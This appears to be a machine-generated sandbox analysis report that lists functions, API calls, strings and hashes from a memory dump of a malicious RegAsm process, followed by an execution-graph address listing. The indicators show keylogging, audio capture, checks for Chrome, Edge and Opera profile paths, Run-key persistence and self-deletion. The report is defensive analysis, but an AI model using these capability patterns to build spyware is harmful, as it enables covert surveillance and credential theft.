                                                                                                                          • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                          APIs
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                          • String ID: Unknown exception
                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                          APIs
                                                                                                                          • waveInPrepareHeader.WINMM(00759000,00000020,?), ref: 00401849
                                                                                                                          • waveInAddBuffer.WINMM(00759000,00000020), ref: 0040185F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: wave$BufferHeaderPrepare
                                                                                                                          • String ID: XMG
                                                                                                                          • API String ID: 2315374483-813777761
                                                                                                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                          APIs
                                                                                                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocaleValid
                                                                                                                          • String ID: IsValidLocaleName$kKD
                                                                                                                          • API String ID: 1901932003-3269126172
                                                                                                                          • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                          • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                          APIs
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                          • API String ID: 1174141254-4188645398
                                                                                                                          • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                          • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                          APIs
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                          • API String ID: 1174141254-2800177040
                                                                                                                          • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                          • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                          APIs
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                          • API String ID: 1174141254-1629609700
                                                                                                                          • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                          • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                          APIs
                                                                                                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                          • String ID: [AltL]$[AltR]
                                                                                                                          • API String ID: 2738857842-2658077756
                                                                                                                          • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                          • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteShell
                                                                                                                          • String ID: !D@$open
                                                                                                                          • API String ID: 587946157-1586967515
                                                                                                                          • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                          • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                          APIs
                                                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: State
                                                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                                                          • API String ID: 1649606143-2446555240
                                                                                                                          • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                          • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                          • String ID: ,kG$0kG
                                                                                                                          • API String ID: 1881088180-2015055088
                                                                                                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteOpenValue
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                          • API String ID: 2654517830-1051519024
                                                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                                                          • String ID: pth_unenc
                                                                                                                          • API String ID: 3325800564-4028850238
                                                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                          APIs
                                                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                                                          • String ID: pth_unenc
                                                                                                                          • API String ID: 1872346434-4028850238
                                                                                                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1717984340-0
                                                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                          APIs
                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4100373531-0
                                                                                                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:2000
                                                                                                                          Total number of Limit Nodes:67
                                                                                                                          execution_graph 37903 44660a 37906 4465e4 37903->37906 37905 446613 37907 4465f3 __dllonexit 37906->37907 37908 4465ed _onexit 37906->37908 37907->37905 37908->37907 40359 441819 40362 430737 40359->40362 40361 441825 40363 430756 40362->40363 40364 43076d 40362->40364 40365 430774 40363->40365 40366 43075f 40363->40366 40364->40361 40376 43034a 40365->40376 40387 4169a7 11 API calls 40366->40387 40369 4307ce 40371 430819 memset 40369->40371 40380 415b2c 40369->40380 40370 43077e 40370->40364 40370->40369 40374 4307fa 40370->40374 40371->40364 40373 4307e9 40373->40364 40373->40371 40388 4169a7 11 API calls 40374->40388 40377 43034e 40376->40377 40379 430359 40376->40379 40389 415c23 memcpy 40377->40389 40379->40370 40381 415b42 40380->40381 40386 415b46 40380->40386 40382 415b94 40381->40382 40384 415b5a 40381->40384 40381->40386 40383 4438b5 10 API calls 40382->40383 40383->40386 40385 415b79 memcpy 40384->40385 40384->40386 40385->40386 40386->40373 40387->40364 40388->40364 40389->40379 37721 442ec6 19 API calls 37898 4152c6 malloc 37899 4152e2 37898->37899 37900 4152ef 37898->37900 37902 416760 11 API calls 37900->37902 37902->37899 37909 4466f4 37928 446904 37909->37928 37911 446700 GetModuleHandleA 37914 446710 __set_app_type __p__fmode __p__commode 37911->37914 37913 4467a4 37915 4467ac __setusermatherr 37913->37915 37916 4467b8 37913->37916 37914->37913 37915->37916 37929 4468f0 _controlfp 37916->37929 37918 4467bd _initterm GetEnvironmentStringsW _initterm 37919 44681e GetStartupInfoW 37918->37919 37920 446810 37918->37920 37922 446866 GetModuleHandleA 37919->37922 37930 41276d 37922->37930 37926 446896 exit 37927 44689d _cexit 37926->37927 37927->37920 37928->37911 37929->37918 37931 41277d 37930->37931 37973 4044a4 LoadLibraryW 37931->37973 37933 412785 37934 412789 37933->37934 37979 414b81 37933->37979 37934->37926 37934->37927 37937 4127c8 37983 412465 memset ??2@YAPAXI 37937->37983 37939 4127ea 37995 40ac21 37939->37995 37944 412813 38013 40dd07 memset 37944->38013 37945 412827 38018 40db69 memset 37945->38018 37948 412822 38040 4125b6 ??3@YAXPAX DeleteObject 37948->38040 37950 40ada2 _wcsicmp 37951 41283d 37950->37951 37951->37948 37954 412863 CoInitialize 37951->37954 38023 41268e 37951->38023 37953 412966 38041 40b1ab free free 37953->38041 38039 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37954->38039 37958 41296f 38042 40b633 37958->38042 37960 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37965 412957 CoUninitialize 37960->37965 37970 4128ca 37960->37970 37965->37948 37966 4128d0 TranslateAcceleratorW 37967 412941 GetMessageW 37966->37967 37966->37970 37967->37965 37967->37966 37968 412909 IsDialogMessageW 37968->37967 37968->37970 37969 4128fd IsDialogMessageW 37969->37967 37969->37968 37970->37966 37970->37968 37970->37969 37971 41292b TranslateMessage DispatchMessageW 37970->37971 37972 41291f IsDialogMessageW 37970->37972 37971->37967 37972->37967 37972->37971 37974 4044f3 37973->37974 37978 4044cf FreeLibrary 37973->37978 37976 404507 MessageBoxW 37974->37976 37977 40451e 37974->37977 37976->37933 37977->37933 37978->37974 37980 414b8a 37979->37980 37981 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37979->37981 38046 40a804 memset 37980->38046 37981->37937 37984 4124e0 37983->37984 37985 412505 ??2@YAPAXI 37984->37985 37986 41251c 37985->37986 37991 412521 37985->37991 38068 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37986->38068 38057 444722 37991->38057 37994 41259b wcscpy 37994->37939 38073 40b1ab free free 37995->38073 37999 40ad4b 38008 40ad76 37999->38008 38097 40a9ce 37999->38097 38000 40a9ce malloc memcpy free free 38001 40ac5c 38000->38001 38001->37999 38001->38000 38003 40ace7 free 38001->38003 38001->38008 38077 40a8d0 38001->38077 38089 4099f4 38001->38089 38003->38001 38007 40a8d0 7 API calls 38007->38008 38074 40aa04 38008->38074 38009 40ada2 38010 40adc9 38009->38010 38011 40adaa 38009->38011 38010->37944 38010->37945 38011->38010 38012 40adb3 _wcsicmp 38011->38012 38012->38010 38012->38011 38102 40dce0 38013->38102 38015 40dd3a GetModuleHandleW 38107 40dba7 38015->38107 38019 40dce0 3 API calls 38018->38019 38020 40db99 38019->38020 38179 40dae1 38020->38179 38193 402f3a 38023->38193 38025 412766 38025->37948 38025->37954 38026 4126d3 _wcsicmp 38027 4126a8 38026->38027 38027->38025 38027->38026 38029 41270a 38027->38029 38228 4125f8 7 API calls 38027->38228 38029->38025 38196 411ac5 38029->38196 38039->37960 38040->37953 38041->37958 38043 40b640 38042->38043 38044 40b639 free 38042->38044 38045 40b1ab free free 38043->38045 38044->38043 38045->37934 38047 40a83b GetSystemDirectoryW 38046->38047 38048 40a84c wcscpy 38046->38048 38047->38048 38053 409719 wcslen 38048->38053 38051 40a881 LoadLibraryW 38052 40a886 38051->38052 38052->37981 38054 409724 38053->38054 38055 409739 wcscat LoadLibraryW 38053->38055 38054->38055 38056 40972c wcscat 38054->38056 38055->38051 38055->38052 38056->38055 38058 444732 38057->38058 38059 444728 DeleteObject 38057->38059 38069 409cc3 38058->38069 38059->38058 38061 412551 38062 4010f9 38061->38062 38063 401130 38062->38063 38064 401134 GetModuleHandleW LoadIconW 38063->38064 38065 401107 wcsncat 38063->38065 38066 40a7be 38064->38066 38065->38063 38067 40a7d2 38066->38067 38067->37994 38067->38067 38068->37991 38072 409bfd memset wcscpy 38069->38072 38071 409cdb CreateFontIndirectW 38071->38061 38072->38071 38073->38001 38075 40aa14 38074->38075 38076 40aa0a free 38074->38076 38075->38009 38076->38075 38078 40a8eb 38077->38078 38079 40a8df wcslen 38077->38079 38080 40a906 free 38078->38080 38081 40a90f 38078->38081 38079->38078 38085 40a919 38080->38085 38082 4099f4 3 API calls 38081->38082 38082->38085 38083 40a932 38087 4099f4 3 API calls 38083->38087 38084 40a929 free 38086 40a93e memcpy 38084->38086 38085->38083 38085->38084 38086->38001 38088 40a93d 38087->38088 38088->38086 38090 409a41 38089->38090 38091 4099fb malloc 38089->38091 38090->38001 38093 409a37 38091->38093 38094 409a1c 38091->38094 38093->38001 38095 409a30 free 38094->38095 38096 409a20 memcpy 38094->38096 38095->38093 38096->38095 38098 40a9e7 38097->38098 38099 40a9dc free 38097->38099 38101 4099f4 3 API calls 38098->38101 38100 40a9f2 38099->38100 38100->38007 38101->38100 38126 409bca GetModuleFileNameW 38102->38126 38104 40dce6 wcsrchr 38105 40dcf5 38104->38105 38106 40dcf9 